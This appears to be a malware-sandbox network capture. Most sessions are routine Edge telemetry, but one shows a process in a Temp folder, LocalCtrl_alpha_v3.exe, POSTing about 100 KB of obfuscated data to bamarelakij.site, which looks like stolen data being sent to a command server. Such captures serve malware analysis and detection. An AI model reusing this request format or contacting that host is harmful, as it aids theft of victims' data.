                                                                                                                                                            Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                            Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            ETag: "9270eb7934bdb1:0"
                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                            P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                            Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                            Set-Cookie: MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; domain=.msn.com; expires=Sat, 31-Jan-2026 22:05:09 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                            Set-Cookie: SRM_M=04956DB2EAC862DE2FFB78DEEBAA63F6; domain=c.msn.com; expires=Sat, 31-Jan-2026 22:05:09 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                            Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 13-Jan-2025 22:05:09 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                            Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 06-Jan-2025 22:15:09 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:09 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 42
                                                                                                                                                            2025-01-06 22:05:09 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                            Data Ascii: GIF89a!,L;


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            13192.168.2.44987820.189.173.44435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:10 UTC1026OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109258&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 10929
                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                            Accept: */*
                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                            Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1
                                                                                                                                                            2025-01-06 22:05:10 UTC10929OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 30 35 3a 30 39 2e 32 35 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 39 31 39 35 33 39 37 37 2d 34 34 63 34 2d 34 37 30 38 2d 62 38 35 37 2d 63 39 37 39 61 31 38 36 36 36 61 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 36 37 31 37 38 39 38 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                            Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:05:09.257Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"91953977-44c4-4708-b857-c979a18666a8","epoch":"767178987"},"app":{"locale"
                                                                                                                                                            2025-01-06 22:05:10 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                            Set-Cookie: MC1=GUID=3eb1ebf74977477bb7a5db88cecbe8f6&HASH=3eb1&LV=202501&V=4&LU=1736201110542; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:05:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                            Set-Cookie: MS0=75d6df9e6f9c48e0bf38df900cda8b80; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:35:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                            time-delta-millis: 1284
                                                                                                                                                            Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:10 GMT
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            14192.168.2.44987920.189.173.44435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:10 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109269&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 31919
                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                            Accept: */*
                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                            Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                            2025-01-06 22:05:10 UTC16384OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 30 35 3a 30 39 2e 32 36 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 39 31 39 35 33 39 37 37 2d 34 34 63 34 2d 34 37 30 38 2d 62 38 35 37 2d 63 39 37 39 61 31 38 36 36 36 61 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 36 37 31 37 38 39 38 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                            Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:05:09.265Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"91953977-44c4-4708-b857-c979a18666a8","epoch":"767178987"},"app":{"locale"
                                                                                                                                                            2025-01-06 22:05:10 UTC15535OUTData Raw: 69 65 6e 74 49 64 22 3a 22 30 34 39 35 36 44 42 32 45 41 43 38 36 32 44 45 32 46 46 42 37 38 44 45 45 42 41 41 36 33 46 36 22 2c 22 73 63 72 6f 6c 6c 4f 66 66 73 65 74 22 3a 30 2c 22 61 6e 6f 6e 63 6b 6e 6d 22 3a 22 61 70 70 5f 61 6e 6f 6e 22 2c 22 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 68 69 64 64 65 6e 4f 6e 63 65 22 3a 66 61 6c 73 65 2c 22 6d 75 69 64 22 3a 22 30 34 39 35 36 44 42 32 45 41 43 38 36 32 44 45 32 46 46 42 37 38 44 45 45 42 41 41 36 33 46 36 22 7d 2c 22 66 6c 69 67 68 74 22 3a 7b 22 74 6d 70 6c 22 3a 22 65 64 67 65 2d 61 70 69 73 3a 31 35 3b 6e 66 5f 75 73 65 72 6e 75 72 74 75 72 69 6e 67 5f 69 6e 69 74 3a 30 5f 2d 31 3b 69 6e 69 74 2d 64 6c 61 79 6f 75 74 3a 31 3b 4c 46 4d 69 73 6d 61 74 63 68 55 46 3a 55 46 3a 6f
                                                                                                                                                            Data Ascii: ientId":"04956DB2EAC862DE2FFB78DEEBAA63F6","scrollOffset":0,"anoncknm":"app_anon","cookieEnabled":true,"hiddenOnce":false,"muid":"04956DB2EAC862DE2FFB78DEEBAA63F6"},"flight":{"tmpl":"edge-apis:15;nf_usernurturing_init:0_-1;init-dlayout:1;LFMismatchUF:UF:o
                                                                                                                                                            2025-01-06 22:05:11 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                            Set-Cookie: MC1=GUID=6acb1009cb61443fa6f21f062b0bfa77&HASH=6acb&LV=202501&V=4&LU=1736201110821; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:05:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                            Set-Cookie: MS0=775d0a8276694a00b762f69ad81486e8; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:35:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                            time-delta-millis: 1552
                                                                                                                                                            Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:10 GMT
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            15192.168.2.44988720.189.173.44435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:11 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109885&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 5379
                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                            Accept: */*
                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                            Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; msnup=
                                                                                                                                                            2025-01-06 22:05:11 UTC5379OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 30 35 3a 30 39 2e 38 38 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 39 31 39 35 33 39 37 37 2d 34 34 63 34 2d 34 37 30 38 2d 62 38 35 37 2d 63 39 37 39 61 31 38 36 36 36 61 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 36 37 31 37 38 39 38 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                            Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:05:09.884Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"91953977-44c4-4708-b857-c979a18666a8","epoch":"767178987"},"app":{"locale"
                                                                                                                                                            2025-01-06 22:05:11 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                            Set-Cookie: MC1=GUID=cdb332a445824e5d9286e73997915b78&HASH=cdb3&LV=202501&V=4&LU=1736201111239; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:05:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                            Set-Cookie: MS0=96ed84cb275f47499dbefa3f9e3ec88a; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:35:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                            time-delta-millis: 1354
                                                                                                                                                            Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:11 GMT
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            16192.168.2.44988820.189.173.44435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:11 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201110262&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 9878
                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                            Accept: */*
                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                            Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; msnup=
                                                                                                                                                            2025-01-06 22:05:11 UTC9878OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 30 35 3a 31 30 2e 32 36 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 39 31 39 35 33 39 37 37 2d 34 34 63 34 2d 34 37 30 38 2d 62 38 35 37 2d 63 39 37 39 61 31 38 36 36 36 61 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 36 37 31 37 38 39 38 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                            Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-06T22:05:10.261Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"91953977-44c4-4708-b857-c979a18666a8","epoch":"767178987"},"app":{"loca
                                                                                                                                                            2025-01-06 22:05:11 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                            Set-Cookie: MC1=GUID=3eca1dab34f5438ca2cdb8661bf2dbd9&HASH=3eca&LV=202501&V=4&LU=1736201111536; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:05:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                            Set-Cookie: MS0=fd12f28c77ba4a8e91d34573710e4491; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:35:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                            time-delta-millis: 1274
                                                                                                                                                            Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:11 GMT
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            17192.168.2.449911104.21.80.524434176C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:14 UTC459OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            Content-Length: 103796
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:05:14 UTC15331OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 e9 3e 01 00 08 00 00 00 52 00 00 00 fd 04 e9 09 95 a7 40 16 d7 35 c9 59 eb 01 00 00 00 00 00 00 00 00 00 00 fe 02 f4 84 c9 60 48 49 4c 60 48 53 a1 34 39 b7 b6 b2 ec 1a a1 1d 2e aa b9 b2 39 b9 2e 35 b7 37 b2 b9 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 c8 cc 60 48 d3 22 b2 33 b0 ba 36 3a ec 1e a1 1d 2e aa b9 b2 39 b9 2e 35 b7 37 b2 b9 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 2e 22 b2 33 b0 ba 36 3a ec 1a b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a1 34 39 b7 b6 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 26 b7 b3 b4 37 10 22 b0 3a b0
                                                                                                                                                            Data Ascii: >R@5Y`HIL`HS49.9.57.88":.&6.6.49.9":`H"36:.9.57.88":.&6.6.49.9":."36:49199.49.8936."36:.&7":
                                                                                                                                                            2025-01-06 22:05:14 UTC15331OUTData Raw: de 5d 60 66 2d 42 f5 40 44 aa 2b f1 83 6b 82 be 02 fb 12 0e 0a b0 ae 1a 02 c9 7d eb bb 24 5f 21 36 1e 3d 95 74 6c 23 93 dc 4b ae ac 63 d8 2e 42 28 ec 3d 29 0b 22 4b 68 0d b0 34 65 2d 41 25 5e 58 a6 79 d6 ae 2b f5 0a ee 6f 1d 9a 1f 18 a6 ab ab 1b e1 92 62 7b 59 dd e9 5a 00 45 ff 88 6b 83 50 79 f7 cb 52 ec 46 0f 0c 1f c5 3a 05 90 28 6d 35 72 59 cc e6 c8 42 59 af 0f 23 1e 4b 31 a9 f4 05 bd 1e 31 d9 f5 0d 34 57 2f 63 7a c1 3d 25 09 b9 1e 68 e1 84 85 be a1 c7 96 07 27 7e d6 ce 84 af ae a8 f2 26 3c ba 5f a1 e4 78 f9 84 24 6e ee 9f 2c 3f f9 6d 56 47 2b ce b0 d3 83 28 24 6f 40 82 42 35 0e 8e 47 96 e1 2b c2 26 8d bc cb 7b ca a3 90 55 7b f0 8f e6 e0 6f e0 c1 34 b6 d1 3b b3 6b f2 14 b2 ad 80 90 87 3f 7b f1 a1 6e af c1 70 8c dd 78 3e b2 4a ba a8 72 42 03 31 e7 b1 34
                                                                                                                                                            Data Ascii: ]`f-B@D+k}$_!6=tl#Kc.B(=)"Kh4e-A%^Xy+ob{YZEkPyRF:(m5rYBY#K114W/cz=%h'~&<_x$n,?mVG+($o@B5G+&{U{o4;k?{npx>JrB14
                                                                                                                                                            2025-01-06 22:05:14 UTC15331OUTData Raw: a7 4e f7 1f 20 30 16 4c c3 95 72 68 fe c4 ac 50 e3 c7 d2 7b 2b aa 64 f2 25 00 11 e0 d7 46 92 c5 6d 54 8f 0e f4 54 da 53 36 af 94 2b a9 bf 63 7f 35 1f 1f e0 d8 33 bd e5 95 4e 2d 94 40 f6 35 00 b5 bf a5 de 93 03 1f 8a 5d e9 ca da 53 ca f7 3d 70 13 5c d5 a5 54 6e ba e9 b8 97 2a e1 35 64 1c a0 27 21 9c f5 c1 79 c0 83 94 66 e7 95 16 a5 d2 a0 96 ab d3 f9 24 52 9b 09 21 03 4a 27 e9 2c 3e 9d 7d 98 1e 93 93 77 b1 90 f8 51 9e 31 89 5f b5 74 bc 47 9f 43 bb 99 03 ee 68 f7 dc 7a ba a7 68 5b 3c 72 86 69 61 e3 1a 75 8e 49 63 e5 40 27 c4 fc f2 53 c3 27 f4 dc 2b de 20 1a bb c0 59 de 24 1e bb 1d d2 80 f3 20 14 05 ab 9e ed d6 f7 26 82 b8 10 a3 91 45 07 5b 76 67 aa 0a d8 52 9a bb 18 cd d1 da 1e d4 2f a7 ec 36 0a 80 cc b8 b9 6f 72 a1 8b f3 48 19 1b 13 c0 3e b8 45 c8 33 57 eb
                                                                                                                                                            Data Ascii: N 0LrhP{+d%FmTTS6+c53N-@5]S=p\Tn*5d'!yf$R!J',>}wQ1_tGChzh[<riauIc@'S'+ Y$ &E[vgR/6orH>E3W
                                                                                                                                                            2025-01-06 22:05:14 UTC15331OUTData Raw: d6 b6 63 d1 c3 cd 2d 8e c9 ea b1 c8 e8 28 52 90 f2 83 08 48 86 54 3c 24 9f 15 76 b3 9d 93 06 07 9a e6 c8 98 30 f8 48 3f 6c 0a 91 e7 ea d7 61 8a e9 80 38 38 55 b0 4f 46 80 47 87 76 d1 3d 1a 57 24 0d 07 18 52 45 7a 13 d8 29 57 19 62 9b 2e 1d a9 65 50 f8 3c 5c 13 9e 87 b8 49 6a 47 0b 42 4b fd 26 81 11 1b da 21 8f 87 b1 7c 65 e8 e1 93 ab e6 e4 da db 21 6a cd 1c 3e f8 cb 61 fe ff 77 64 c6 82 1d 92 74 c6 bc 11 e8 cd 61 0c 77 b9 3a 58 6c eb 39 de 8c 56 f0 3f 93 87 e5 3e 9a df 4b 7f 06 d0 9b 6b 44 42 8f 45 be dc e7 14 10 31 ae 95 7a f0 18 43 8b 0c 9e 1e 7b ea 1e ed 3d a5 42 ef c4 e1 38 bf e4 f9 82 1d 96 74 c6 b2 11 e8 dd 61 0c 4f f9 3a 58 5c 69 39 be 0d 56 f0 bd 93 87 93 be 9a 83 cb 7f 16 50 9b 5b 04 4e 8f 05 35 dc e7 19 10 31 33 96 7a 5d 58 43 ed 0d 1e 26 3b 4b
